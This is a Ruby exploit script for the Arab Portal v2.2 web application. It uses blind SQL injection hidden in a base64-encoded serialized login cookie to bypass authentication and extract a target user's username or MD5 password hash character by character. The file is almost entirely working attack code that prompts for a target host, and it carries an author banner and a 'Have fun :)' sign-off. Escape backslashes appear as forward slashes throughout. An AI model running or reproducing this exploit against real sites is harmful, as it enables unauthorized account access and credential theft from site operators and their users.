#!/usr/bin/ruby
#=============================================## Arab Portal v2.2 Exploit #,# Blind SQL Injection / Authentication Bypass ## Discovered & written by: Jafer Al-Zidjali ## Email: jafer@scorpionds.com ## Website: www.scorpionds.com ##=============================================#
require "net/http"require "base64"
intro=[ "+=============================================+", "+ Arab Portal v2.2 Exploit +", "+ Blind SQL Injection / Authentication Bypass +", "+ Discovered & written by: Jafer Al-Zidjali +", "+ Email: jafer@scorpionds.com +", "+ Website: www.scorpionds.com +", "+=============================================+" ]
def print_intro text w="|" text.each do |str| str.scan(/./) do |c| STDOUT.flush if w=="|" print "/b"+c +w w="/" elsif w=="/" print "/b"+c +w w="-" elsif w=="-" print "/b"+c +w w="//" else print "/b"+c +w w="|" end sleep 0.05 end print "/b " puts "" endend
print_intro intro
puts "/nEnter host name (e.g. example.com):"host=gets.chomp
puts "/nEnter script path (e.g. /arabportal/):"path=gets.chomp
puts "/nEnter userid:"userid=gets.chomp
puts "/nGetting cookie value..."
http = Net::HTTP.new(host, 80)
resp= http.get(path)cookie = resp.response["set-cookie"]
len=cookie.split("; ").lengthmax=0login_info=""
len.times do |count| clen=cookie.split("; ")[count].length if clen > max then max=clen login_info=cookie.split("; ")[count] endend
login_info=login_info.split(", ")
if login_info[0].length > login_info[1].lengthlogin_info=login_info[0]elselogin_info=login_info[1]end
login_info=login_info.split("=")[0]
puts "Cookie name is: "+login_info
puts "/nWhat do you want to do?"puts "1. Get username."puts "2. Get password hash."
opt=gets.chomp
if opt=="1" unamelen=0 print "/nGetting username length"
20.times do |x| stmt="#{userid}"+ "/x27/x20/x61/x6e/x64/x20/x6c"+ "/x65/x6e/x67/x74/x68/x28/x75"+ "/x73/x65/x72/x6e/x61/x6d/x65"+ "/x29/x3d#{x}/x20/x6f/x72/x20/x27/x27/x3d/x27"
shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+ "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+ "/x72/x61/x62/x70/x6f/x72/x74/x61"+ "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+ "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+ stmt.length.to_s+ "/x3a/x22"+ stmt+ "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+ "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+ "/x31/x3a/x22/x61/x22/x3b/x7d"
header={ "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"") }
resp= http.get(path,header) if resp.body =~ /action=logout/ puts "/nLength is: #{x}" unamelen=x break else print "." STDOUT.flush end end
chars="abcdefghijklmnopqrstuvwxyz0123456789"
print "/nGetting username: " unamelen.times do |z| chars.scan(/./) do |c| stmt="#{userid}"+ "/x27/x20/x61/x6e/x64/x20/x73"+ "/x75/x62/x73/x74/x72/x69/x6e"+ "/x67/x28/x75/x73/x65/x72/x6e"+ "/x61/x6d/x65/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27/x20/x6f/x72/x20/x27/x27/x3d/x27"
shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+ "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+ "/x72/x61/x62/x70/x6f/x72/x74/x61"+ "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+ "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+ stmt.length.to_s+ "/x3a/x22"+ stmt+ "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+ "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+ "/x31/x3a/x22/x61/x22/x3b/x7d"
header={ "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"") } print c STDOUT.flush http = Net::HTTP.new(host, 80) resp= http.get(path,header) if resp.body =~ /action=logout/ break end print "/b" end end puts "/nHave fun :)"
elsif opt=="2" chars="0123456789abcdef"
print "/nGetting password hash: " 32.times do |z| chars.scan(/./) do |c| stmt="#{userid}"+ "/x27/x20/x61/x6e/x64/x20/x73/x75"+ "/x62/x73/x74/x72/x69/x6e/x67/x28"+ "/x70/x61/x73/x73/x77/x6f/x72/x64"+ "/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27"+ "/x20/x6f/x72/x20/x27/x27/x3d/x27" shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+ "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+ "/x72/x61/x62/x70/x6f/x72/x74/x61"+ "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+ "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+ stmt.length.to_s+ "/x3a/x22"+ stmt+ "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+ "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+ "/x31/x3a/x22/x61/x22/x3b/x7d" header={ "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"") } print c STDOUT.flush http = Net::HTTP.new(host, 80) resp= http.get(path,header) if resp.body =~ /action=logout/ break end print "/b" end end puts "/nHave fun :)"end